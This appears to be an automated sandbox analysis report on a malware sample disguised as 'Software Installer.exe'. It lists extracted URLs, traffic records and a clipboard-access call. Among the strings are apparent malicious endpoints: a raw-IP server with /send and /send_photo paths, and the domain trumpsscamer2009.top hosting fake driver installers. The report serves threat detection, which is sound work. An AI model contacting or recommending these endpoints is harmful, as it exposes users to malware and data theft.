Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E35A8000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E30C6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://83.217.208.69:5000/
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C00000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E30E1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://83.217.208.69:5000/send
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E30C6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://83.217.208.69:5000/send_photo
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C00000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E3000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E3000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E30D7000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E30BF000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E31ED000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E3000000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org:80/
Source: powershell.exe, 00000001.00000002.1567265583.000001E864080000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
Source: powershell.exe, 00000003.00000002.1451271173.0000011AE08D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 00000003.00000002.1451271173.0000011AE08D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.ctain
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C00000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E3096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E30D7000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E3096000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E31ED000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E30C6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/8.46.123.189
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E30D7000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/8.46.123.189P
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E3096000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com:80/
Source: powershell.exe, 00000001.00000002.1537154650.000001E85BC96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1451937888.0000011AE3E4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1496243972.0000011AF24F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1496243972.0000011AF2639000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1708631354.000001A997795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1581805371.000001A987948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E309C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
Source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649435379.000001D772E10000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E309C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/NETdesign.Plugin.Notifer
Source: Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.IO
Source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Runtime.Serialization
Source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml
Source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.Xml.Linq
Source: Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemV
Source: Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemY
Source: Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/dhttp://schemas.datacontract.org/2004/07/System.XmlRhttp://w
Source: powershell.exe, 00000001.00000002.1456923011.000001E84BE48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1581805371.000001A987948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649480850.000001D773211000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649544937.000001D773240000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2649435379.000001D772E10000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649480850.000001D773211000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649544937.000001D773240000.00000004.10000000.00040000.00000000.sdmp, powershell.exe, 00000001.00000002.1456923011.000001E84BC21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1451937888.0000011AE2481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1581805371.000001A987721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.o
Source: powershell.exe, 00000001.00000002.1456923011.000001E84BE48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1581805371.000001A987948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000003.00000002.1451937888.0000011AE3A5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://trumpsscamer2009.top
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E35CE000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E35ED000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E35DE000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E35B3000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E35C0000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E33BE000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E3593000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E35A8000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E31ED000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E30EE000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E31DA000.00000004.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2648602721.00000196E31E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://trumpsscamer2009.top:443/
Source: powershell.exe, 00000006.00000002.1581805371.000001A987948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1508507784.0000011AFAB7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.D
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774886000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652757290.000001D775090000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649978603.000001D773AE6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/binaryformatter
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?Description:
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774886000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649978603.000001D773AE6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774886000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649978603.000001D773AE6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehost
Source: Software Installer.exe, 00000000.00000002.2650876819.000001D774886000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649978603.000001D773AE6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773AE6000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649696226.000001D7732B1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654880930.000001D777BE0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/downloadCommon
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/info
Source: Software Installer.exe, 00000000.00000000.1391966505.00007FF6A439D000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/sdk-not-found
Source: Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
Source: powershell.exe, 00000001.00000002.1456923011.000001E84BC21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1451937888.0000011AE2481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1581805371.000001A987721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: Software Installer.exe, 00000000.00000002.2652757290.000001D775090000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/serializationformat-binary-obsolete
Source: Software Installer.exe, 00000000.00000002.2655922975.000001D7782C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aka.ms/systemdrawingnonwindows
Source: MSBuild.exe, 0000000D.00000002.1762556827.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/
Source: MSBuild.exe, 0000000D.00000002.1761468258.000000000110B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJIS
Source: MSBuild.exe, 0000000D.00000002.1761468258.000000000110B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISz
Source: MSBuild.exe, 0000000D.00000002.1762556827.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/y
Source: MSBuild.exe, 0000000D.00000002.1760579162.00000000010F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet:443/gdJIS
Source: powershell.exe, 00000006.00000002.1708631354.000001A997795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1708631354.000001A997795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1708631354.000001A997795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.1581805371.000001A987948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: Software Installer.exe, 00000000.00000002.2656419896.000001D778770000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/linker/issues/2715.
Source: Software Installer.exe, Software Installer.exe, 00000000.00000002.2653422218.000001D776DA1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653065772.000001D775261000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2647654410.00000196DC880000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654007016.000001D7775C1000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654304809.000001D777801000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652733750.000001D775080000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2656228625.000001D778571000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649652908.000001D773290000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653948791.000001D777590000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649945136.000001D773320000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650830040.000001D774010000.00000004.00000020.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2652331382.000001D774FE0000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654943566.000001D777C40000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2654693448.000001D777A80000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655606492.000001D778150000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2653300355.000001D776D31000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2656419896.000001D778770000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2655994166.000001D778370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649480850.000001D773211000.00000020.00001000.00020000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2649593187.000001D773271000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime/issues/71847
Source: Software Installer.exe, 00000000.00000002.2655922975.000001D7782C0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/winforms
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mono/linker/issues/378
Source: Software Installer.exe, 00000000.00000002.2649978603.000001D773370000.00000004.10000000.00040000.00000000.sdmp, Software Installer.exe, 00000000.00000002.2650876819.000001D774111000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mono/linker/pull/649
Source: powershell.exe, 00000003.00000002.1451937888.0000011AE30B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1537154650.000001E85BC96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1451937888.0000011AE3E4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1496243972.0000011AF24F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1496243972.0000011AF2639000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1708631354.000001A997795000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1451937888.0000011AE30B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://trumpsscamer2009.top
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E30D7000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://trumpsscamer2009.top/bld/Microsoft_Driver_vs_2019.exex
Source: Software Installer.exe, 00000000.00000002.2648602721.00000196E30D7000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://trumpsscamer2009.top/bld/Printer_driver_Setup_Install_v32.12.71.exe
Source: Software Installer.exe, 00000000.00000002.2648229464.00000196E0C00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://trumpsscamer2009.top/bld/Printer_driver_Setup_Install_v32.12.71.exehttps://trumpsscamer2009.
Source: powershell.exe, 00000003.00000002.1451271173.0000011AE08D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://trumpsscamer2009.top/scr/plugin
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownHTTPS traffic detected: 172.67.159.94:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.159.94:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.159.94:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49735 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 13_2_0043F410 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,13_2_0043F410
